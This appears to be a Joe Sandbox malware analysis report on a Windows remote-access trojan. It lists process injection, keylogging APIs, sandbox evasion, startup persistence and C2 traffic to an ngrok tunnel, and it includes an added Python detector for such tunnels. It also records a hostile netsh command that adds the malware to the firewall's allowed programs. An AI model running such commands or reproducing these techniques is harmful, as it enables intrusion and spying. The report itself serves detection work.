        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, kl.cs  Reference to suspicious API methods: MapVirtualKey(a, 0u)
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, kl.cs  Reference to suspicious API methods: GetAsyncKeyState(num2)
        Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, OK.cs  Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe  Code function: 1_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,  1_2_00405A10
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe  Memory written: C:\Users\user\Desktop\iR2UtZj5vP.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe  Memory written: C:\Users\user\AppData\Local\Temp\WindowsServices.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe  Process created: C:\Users\user\Desktop\iR2UtZj5vP.exe C:\Users\user\Desktop\iR2UtZj5vP.exe
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe  Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe  Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe  Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe  Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
        Source: C:\Windows\SysWOW64\netsh.exe  Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings

        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeRegistry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

        Stealing of Sensitive Information

        Source: Yara match; File source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: Process Memory Space: iR2UtZj5vP.exe PID: 7976, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: iR2UtZj5vP.exe PID: 8100, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: WindowsServices.exe PID: 7180, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: WindowsServices.exe PID: 7396, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: WindowsServices.exe PID: 340, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: WindowsServices.exe PID: 2928, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: WindowsServices.exe PID: 2292, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: WindowsServices.exe PID: 2960, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: WindowsServices.exe PID: 2536, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: WindowsServices.exe PID: 4520, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara match; File source: 18.2.WindowsServices.exe.25c0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: Process Memory Space: iR2UtZj5vP.exe PID: 7976, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: iR2UtZj5vP.exe PID: 8100, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: WindowsServices.exe PID: 7180, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: WindowsServices.exe PID: 7396, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: WindowsServices.exe PID: 340, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: WindowsServices.exe PID: 2928, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: WindowsServices.exe PID: 2292, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: WindowsServices.exe PID: 2960, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: WindowsServices.exe PID: 2536, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: WindowsServices.exe PID: 4520, type: MEMORYSTR
        Technique matrix (numeric prefixes are the count badges shown beside each technique in the report):

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | 21 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 21 Scripting | 1 DLL Side-Loading | 31 Disable or Modify Tools | 1 Input Capture | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | 21 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 12 System Information Discovery | Remote Desktop Protocol | 1 Input Capture | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | 221 Registry Run Keys / Startup Folder | 211 Process Injection | 21 Obfuscated Files or Information | Security Account Manager | 311 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 221 Registry Run Keys / Startup Folder | 11 Software Packing | NTDS | 231 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 11 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 231 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
        IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 211 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
        Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Rundll32 | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
        Behavior Graph ID: 1386934; Sample: iR2UtZj5vP.exe; Start date: 05/02/2024; Architecture: WINDOWS; Score: 100

        Start (node 2)
          DNS: 0.tcp.in.ngrok.io
          Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures
          Started: iR2UtZj5vP.exe (11), WindowsServices.exe (15), WindowsServices.exe (17), 2 other processes (19)
        iR2UtZj5vP.exe (11)
          Dropped: C:\Users\user\...\iR2UtZj5vP.exex (copy), PE32; C:\Users\user\Desktop\iR2UtZj5vP.exe, PE32
          Signatures: Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Tries to detect sandboxes / dynamic malware analysis system (file name check); Contain functionality to detect virtual machines; 2 other signatures
          Started: iR2UtZj5vP.exe (21), cmd.exe (24)
        WindowsServices.exe (15)
          Signatures: Injects a PE file into a foreign processes
          Started: cmd.exe (27), WindowsServices.exe (29)
        WindowsServices.exe (17)
          Started: cmd.exe (31), WindowsServices.exe (33)
        2 other processes (19)
          Started: cmd.exe (35), WindowsServices.exe (37)
        iR2UtZj5vP.exe (21)
          Dropped: C:\Users\user\AppData\...\WindowsServices.exe, PE32
          Started: WindowsServices.exe (39)
        cmd.exe (24)
          Dropped: C:\Users\user\AppData\Roaming\...\x.vbs, ASCII
          Signatures: Command shell drops VBS files; Drops VBS files to the startup folder
          Started: conhost.exe (43)
        cmd.exe (27) started conhost.exe (45); cmd.exe (31) started conhost.exe (47); cmd.exe (35) started conhost.exe (49)
        WindowsServices.exe (39)
          Dropped: C:\Users\user\...\WindowsServices.exex (copy), PE32
          Signatures: Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Tries to detect sandboxes / dynamic malware analysis system (file name check); Contain functionality to detect virtual machines; 4 other signatures
          Started: WindowsServices.exe (51), cmd.exe (56)
        WindowsServices.exe (51)
          Network: 3.6.115.182 (ports 19208, 49728), AMAZON-02US, United States; 0.tcp.in.ngrok.io 3.6.122.107 (ports 19208, 49705, 49706), AMAZON-02US, United States; 3.6.98.232 (ports 19208, 49720, 49721), AMAZON-02US, United States
          Dropped: C:\...\bf497657d005804b657fde8dd2d0cb46.exe, PE32
          Signatures: Protects its processes via BreakOnTermination flag; Disables zone checking for all users; Creates autostart registry keys with suspicious names
          Started: netsh.exe (58)
        cmd.exe (56) started conhost.exe (60); netsh.exe (58) started conhost.exe (62)

        Source | Detection | Scanner | Label
        iR2UtZj5vP.exe | 87% | ReversingLabs | Win32.Trojan.Skeeeyah
        iR2UtZj5vP.exe | 100% | Avira | BDS/Poison.mon
        iR2UtZj5vP.exe | 100% | Joe Sandbox ML |

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe | 100% | Avira | BDS/Poison.mon
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Local\Temp\WindowsServices.exe | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy) | 0% | ReversingLabs |
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe | 87% | ReversingLabs | Win32.Trojan.Skeeeyah
        C:\Users\user\Desktop\iR2UtZj5vP.exe | 0% | ReversingLabs |
        C:\Users\user\Desktop\iR2UtZj5vP.exex (copy) | 0% | ReversingLabs |

        No Antivirus matches
        No Antivirus matches

        Source | Detection | Scanner | Label
        0.tcp.in.ngrok.io | 100% | Avira URL Cloud | malware
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        0.tcp.in.ngrok.io | 3.6.122.107 | true | true | | unknown

        Name | Malicious | Antivirus Detection | Reputation
        0.tcp.in.ngrok.io | true | Avira URL Cloud: malware | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
3.6.122.107 | 0.tcp.in.ngrok.io | United States | 16509 | AMAZON-02 (US) | true
3.6.115.182 | unknown | United States | 16509 | AMAZON-02 (US) | true
3.6.98.232 | unknown | United States | 16509 | AMAZON-02 (US) | true
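The network tables above show a single ngrok TCP-tunnel hostname, 0.tcp.in.ngrok.io, behind three different Amazon addresses, all contacted on port 19208, and the context tables further down show earlier samples reaching the same hostname through yet other addresses. Blocking the IPs is therefore brittle; the tunnel hostname pattern is the durable indicator and the IP/port pair is only a secondary check. The Python below is an added example, not part of the Joe Sandbox report or of any tooling the report describes: it joins a constructed connection log with constructed DNS answers, tags connections whose destination resolved to an ngrok TCP tunnel endpoint, and summarises ports and connection counts per endpoint. The log format, the SAMPLE_DNS_ANSWERS mapping and the benign 203.0.113.10 / updates.example.net entry are assumptions made for the example; the three 3.6.x.x addresses and port 19208 are taken from the report.

```python
"""Tag connections to ngrok TCP tunnel endpoints in a constructed connection log."""
import re
from collections import defaultdict

# ngrok TCP tunnels are exposed as <n>.tcp[.<region>].ngrok.io, e.g. 0.tcp.in.ngrok.io
NGROK_TCP_HOST = re.compile(r"^\d+\.tcp(?:\.[a-z]{2,3})?\.ngrok\.io$", re.IGNORECASE)

# Indicators from the report: endpoint IPs and the tunnel port they were contacted on
REPORT_IPS = {"3.6.122.107", "3.6.115.182", "3.6.98.232"}
REPORT_PORT = 19208

# Constructed sample log, "ts src_ip src_port dst_ip dst_port proto" (format is an assumption)
SAMPLE_CONN_LOG = """\
1707149500.101 10.0.0.5 49705 3.6.122.107 19208 tcp
1707149500.420 10.0.0.5 49706 3.6.122.107 19208 tcp
1707149512.880 10.0.0.5 49720 3.6.98.232 19208 tcp
1707149513.002 10.0.0.5 49721 3.6.98.232 19208 tcp
1707149520.555 10.0.0.5 49728 3.6.115.182 19208 tcp
1707149530.000 10.0.0.5 49731 203.0.113.10 443 tcp
"""

# Constructed sample: DNS answers seen in the same window (name -> set of IPs)
SAMPLE_DNS_ANSWERS = {
    "0.tcp.in.ngrok.io": {"3.6.122.107", "3.6.98.232", "3.6.115.182"},
    "updates.example.net": {"203.0.113.10"},
}


def parse_conn_log(text):
    """Return one dict per non-empty line of the whitespace-separated connection log."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, dst, dport, proto = line.split()
        records.append({"ts": float(ts), "src": src, "sport": int(sport),
                        "dst": dst, "dport": int(dport), "proto": proto})
    return records


def is_ngrok_tcp_host(name):
    """True for <n>.tcp[.<region>].ngrok.io and nothing else (no suffix/prefix tricks)."""
    return bool(NGROK_TCP_HOST.match(name))


def ip_to_names(dns_answers):
    """Invert name -> {ip} into ip -> {name} so connections can be tagged by hostname."""
    inverted = defaultdict(set)
    for name, ips in dns_answers.items():
        for ip in ips:
            inverted[ip].add(name.lower())
    return inverted


def classify(record, inverted):
    """Tags for one connection: tunnel-hostname match and/or exact report IOC match."""
    tags = []
    names = inverted.get(record["dst"], set())
    if any(is_ngrok_tcp_host(n) for n in names):
        tags.append("ngrok-tcp-tunnel")
    if record["dst"] in REPORT_IPS and record["dport"] == REPORT_PORT:
        tags.append("report-ioc")
    return tags


def find_tunnel_endpoints(records, dns_answers):
    """Summarise every tagged destination: resolved names, ports, count and tags."""
    inverted = ip_to_names(dns_answers)
    hits = {}
    for rec in records:
        tags = classify(rec, inverted)
        if not tags:
            continue
        entry = hits.setdefault(rec["dst"], {"names": set(), "ports": set(),
                                              "count": 0, "tags": set()})
        entry["names"] |= inverted.get(rec["dst"], set())
        entry["ports"].add(rec["dport"])
        entry["count"] += 1
        entry["tags"].update(tags)
    return hits


if __name__ == "__main__":
    summary = find_tunnel_endpoints(parse_conn_log(SAMPLE_CONN_LOG), SAMPLE_DNS_ANSWERS)
    for ip, info in summary.items():
        print(ip, sorted(info["names"]), sorted(info["ports"]), info["count"], sorted(info["tags"]))
```

If DNS is not logged, only the "report-ioc" tag can fire and the detection decays as soon as ngrok rotates its edge addresses; the hostname tag is the one worth keeping in a rule, and the regex is anchored at both ends so that a lookalike such as 0.tcp.in.ngrok.io.example.com does not match.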
          Joe Sandbox version:39.0.0 Ruby
          Analysis ID:1386934
          Start date and time:2024-02-05 17:10:16 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 10m 42s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:31
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:iR2UtZj5vP.exe
          renamed because original name is a hash value
          Original Sample Name:52b074e39e4f3ba00c230ba82eb62499.exe
          Detection:MAL
          Classification:mal100.phis.troj.adwa.spyw.expl.evad.winEXE@35/9@4/3
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 98%
          • Number of executed functions: 126
          • Number of non-executed functions: 57
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Override analysis time to 240000 for current running targets taking high CPU consumption
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • VT rate limit hit for: iR2UtZj5vP.exe
Time | Type | Description
